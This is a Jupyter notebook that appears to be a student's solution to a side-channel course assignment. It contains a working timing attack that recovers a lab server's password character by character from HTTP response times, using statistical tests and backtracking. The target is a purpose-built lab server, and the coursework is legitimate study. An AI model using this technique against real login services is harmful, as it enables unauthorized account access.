In [ ]:
import time
import string
import random
import requests
from statistics import median, stdev
from datetime import datetime
from scipy import stats

## Commands used for docker
```bash
docker pull amarmic/attacks_on_implementations:Assignment1_x86_64
docker run --name ass1 -p 80:8080 amarmic/attacks_on_implementations:Assignment1_x86_64
```

## Commands used for Anaconda to test locally
```bash
conda create --name side_attacks python=3.12
conda install requests
```

In [ ]:
BASE_URL = "http://aoi-assignment1.oy.ne.ro:8080"
# BASE_URL = "http://localhost"
USERNAME = "321892408"
CHARSET = string.ascii_lowercase
REPEATS = 3
INITIAL_REPEATS = 3
CHECK_LENGTH_REPEATS = 3
PASSWORD_LENGTH = 11
DIFFICULTY = 1
ALPHA = 0.005
MAX_PASSWORD_LENGTH = 36

In [ ]:
def find_password_length():
    results = [[] for _ in range(MAX_PASSWORD_LENGTH - 1)]
    for length in range(1, MAX_PASSWORD_LENGTH):
        password = "a" * length
        for _ in range(CHECK_LENGTH_REPEATS):
            t, response = time_request(password)
            if response == "1":
                return length, password
            results[length - 1].append(t)

    avg_times = [sum(lst)/len(lst) for lst in results]
    best_len = avg_times.index(max(avg_times)) + 1
    return best_len, ""

In [ ]:
def t_test(data, best_time):
    t_stat, p_val = stats.ttest_1samp(data, best_time, alternative='less')
    if p_val < ALPHA:
        return True
    return False

In [ ]:
def time_request(password_guess):
    url = f"{BASE_URL}/?user={USERNAME}&password={password_guess}&difficulty={DIFFICULTY}"
    while True:
        try:
            start = time.time()
            response = requests.get(url)
            end = time.time()
            response.raise_for_status()
            return end - start, response.text.strip()
        except requests.exceptions.RequestException as e:
            # print(f"Error during request: {e}")
            time.sleep(random.randint(1, 3))

In [ ]:
def time_trial(trial, repeats=REPEATS, transform=True):
    times = []
    for _ in range(repeats):
        t, response = time_request(trial)
        if response == "1":
            return response, 0
        times.append(pow(t + 7, 2) if transform else t)
    return "0", median(times)

# Connectivity Test

In [ ]:
password = "parshandata"
response = requests.get(f"{BASE_URL}/?user={USERNAME}&password={password}")
print("Response: ", response.url)
if response.status_code != 200 : # sanity check
  print("Error: ", response.status_code)

if response.text == "1":
   print("correct password")
else:
   print("incorrect password")

Response:  http://aoi-assignment1.oy.ne.ro:8080/?user=321892408&password=parshandata
incorrect password


In [ ]:
def guess_password():
    guessed = ""
    min_margin_seconds = 0.25
    do_not_check = [set() for _ in range(MAX_PASSWORD_LENGTH)]
    check_all_letters = False

    # First round: test all characters fully to compute margin
    timings = []
    for c in CHARSET:
        trial = guessed + c + 'a' * (PASSWORD_LENGTH - 1)
        # print(f"Trying first round: {trial}")
        response, score = time_trial(trial, repeats=INITIAL_REPEATS)
        if response == "1":
            return trial
        timings.append((score, c))

    timings.sort(reverse=True)
    best, best_c = timings[0]
    second = timings[1][0]
    third = timings[2][0]
    guessed += best_c
    min_margin_seconds = ((best - second) + (best - third)) / 2 * 0.8

    # Main loop
    while len(guessed) < PASSWORD_LENGTH:
        timings = []
        position = len(guessed)
        if check_all_letters:
            min_margin_seconds *= 0.75
            min_samples_to_early_stop = CHARSET.__len__()
        else:
            min_samples_to_early_stop = 5 if position <= 10 else 7

        for i, c in enumerate(CHARSET):
            if c in do_not_check[position]:
                continue

            trial = guessed + c + 'a' * (PASSWORD_LENGTH - position - 1)
            # print(f"Trying: {trial}")
            response, score = time_trial(trial, repeats=1)
            if response == "1":
                return trial
            timings.append((score, c))

            # Early outlier detection
            if len(timings) >= min_samples_to_early_stop:
                sorted_timings = sorted(timings, reverse=True)
                best_score, best_c = sorted_timings[0]
                second = sorted_timings[1][0]
                third = sorted_timings[2][0]
                avg_top = (second + third) / 2

                if best_score - avg_top > min_margin_seconds:
                    # Confirm it's not noise
                    trial_confirm = guessed + best_c + 'a' * (PASSWORD_LENGTH - position - 1)
                    # print(f"Verifying: {trial_confirm}")
                    _, med_best = time_trial(trial_confirm, repeats=REPEATS)
                    if med_best - avg_top > min_margin_seconds:
                        guessed += best_c
                        # print(f"Confirmed: {guessed}")
                    else:
                        # Replace only the original score
                        timings = [(med_best, char) if char == best_c else (s, char) for (s, char) in timings]
                    if check_all_letters:
                        min_margin_seconds *= 1.6
                        check_all_letters = False
                    break
        if len(guessed) + 1 == PASSWORD_LENGTH:
            for c in CHARSET:
                trial = guessed + c
                response, score = time_trial(trial, repeats=1)
                if response == "1":
                    return trial
            check_all_letters = True
            do_not_check[position].add(guessed[-1])
            guessed = guessed[:-1]
            continue
        if len(timings) == CHARSET.__len__():
            # Didn't find clear outlier, fallback
            best_score, best_c = sorted(timings, reverse=True)[0]
            trial = guessed + best_c + 'a' * (PASSWORD_LENGTH - position - 1)
            if t_test([t[0] for t in timings], best_score):
                guessed += best_c
                check_all_letters = False
            else:
                check_all_letters = True
                do_not_check[position].add(guessed[-1])
                guessed = guessed[:-1]

    return guessed

if __name__ == "__main__":
    USERNAME = input("enter username: ")
    PASSWORD_LENGTH, early_guess = find_password_length()
    if early_guess:
        print(early_guess)
    else:
        password = guess_password()
        print(password)

enter username: 321892408
